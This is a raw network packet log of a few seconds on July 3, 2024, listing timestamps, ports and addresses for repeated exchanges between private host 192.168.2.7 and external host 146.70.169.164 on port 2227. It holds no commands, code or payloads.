Jul 3, 2024 18:02:10.108067989 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.155922890 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.156141996 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.203921080 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.204037905 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.251949072 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.252219915 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.300232887 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.300348997 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.351965904 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.352116108 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.399952888 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.400136948 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.451956034 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.452128887 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.504014015 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.504117012 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.555973053 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.556173086 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.604033947 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.604217052 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.651932001 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.652141094 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.700133085 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.700514078 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.748106003 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.748414040 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.796139002 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.796205044 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.844001055 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.844106913 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.895927906 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.896200895 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.944077969 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.944149971 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:10.992295027 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:10.992362976 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.039977074 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.040038109 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.088411093 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.088462114 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.139878988 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.139924049 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.187884092 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.187935114 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.238617897 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.238677979 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.288002014 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.288064003 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.336090088 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.336160898 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.384061098 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.384128094 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.431917906 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.431977034 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.483880043 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.483935118 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.532103062 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.532159090 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.583880901 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.583933115 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.631912947 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.631984949 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.679912090 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.679960966 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.731952906 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.732013941 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.779936075 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.779987097 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.831928968 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.831983089 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.880390882 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.880451918 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.927921057 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.927961111 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:11.975954056 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:11.976011038 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.028053045 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.028120995 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.080429077 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.080559015 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.131877899 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.132406950 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.183902979 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.183970928 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.231903076 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.232028961 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.279973984 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.280061960 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.331934929 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.334007025 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.379980087 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.380053997 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.428822994 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.428880930 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.476063013 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.476640940 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.531629086 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.531694889 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.584207058 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.584275961 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.636583090 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.636746883 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.683887959 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.683984041 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.735908985 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.735991955 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.788055897 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.788115978 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.839989901 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.842690945 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.888103962 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.888170004 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.939971924 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.940186024 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:12.988087893 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:12.988266945 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.039936066 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.040245056 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.092012882 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.092086077 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.139883995 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.139962912 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.187972069 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.188049078 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.235944033 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.236079931 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.283926964 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.283982992 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.331926107 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.332032919 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.379916906 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.379981041 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.427963018 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.428040028 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.479999065 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.482363939 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.527998924 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.528083086 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.577238083 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.577342033 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.624983072 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.625045061 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.671953917 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.672024965 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.719961882 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.720026970 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.768093109 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.768186092 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.817167044 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.817239046 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.863914013 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.864005089 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.921530008 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.921684027 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:13.967899084 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:13.967963934 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.015981913 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.016129971 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.064075947 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.064254045 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.111934900 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.112006903 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.163880110 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.163944960 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.212068081 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.213166952 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.259942055 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.259994030 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.307917118 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.307993889 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.359941006 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.360064983 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.411915064 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.412137985 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.459897995 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.459975004 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.507957935 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.508030891 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.555892944 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.555973053 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.603916883 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.603990078 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.656622887 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.656697035 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.707894087 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.707951069 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.755930901 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.758018017 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.803880930 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.803941011 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.855885029 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.855930090 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.903877974 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.903939009 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:14.955888033 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:14.955935955 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.007904053 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.007958889 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.055869102 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.055911064 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.107939959 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.108004093 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.159945011 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.160006046 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.207895041 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.208074093 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.255908966 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.256027937 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.304017067 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.304109097 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.351900101 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.351953030 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.399929047 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.399993896 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.447956085 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.448018074 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.499953985 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.500014067 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.553673983 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.553730011 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.602433920 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.602500916 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.648863077 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.648931026 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.696993113 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.697061062 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.743916035 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.743990898 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.795995951 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.796052933 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.844090939 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.844161987 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.891911983 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.891979933 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.939905882 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.939977884 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:15.987879038 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:15.987941027 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.035950899 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.036154032 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.083987951 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.084103107 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.131920099 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.131998062 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.179860115 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.179912090 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.231906891 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.231966972 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.279985905 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.280045033 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.331885099 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.332076073 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.379889965 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.379951954 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.427932978 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.428008080 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.475879908 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.476241112 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.524919033 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.525012016 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.571922064 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.571983099 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.619923115 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.619975090 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.669105053 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.669214010 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.715848923 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.715944052 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.768022060 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.768085003 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.815887928 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.815957069 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.863888025 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.863940954 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.911957979 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.912025928 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:16.959893942 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:16.959959030 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.011985064 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.012042999 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.059890985 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.059938908 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.107975960 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.108099937 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.155983925 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.156040907 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.203871965 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.203927994 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.251877069 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.251929045 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.299880028 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.299936056 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.351877928 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.351928949 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.403861046 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.403903961 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.455909014 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.455965996 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.504388094 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.504471064 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.551938057 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.552030087 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.599935055 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.600018978 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.651949883 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.652004004 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.705859900 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.705914974 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.751964092 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.752031088 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.803827047 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.803880930 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.851831913 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.851874113 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.904520988 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.904706955 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:17.951927900 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:17.951981068 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.000368118 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.000431061 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.048021078 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.048131943 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.099904060 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:18.100052118 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:18.148000002 CEST	2227	49707	146.70.169.164	192.168.2.7
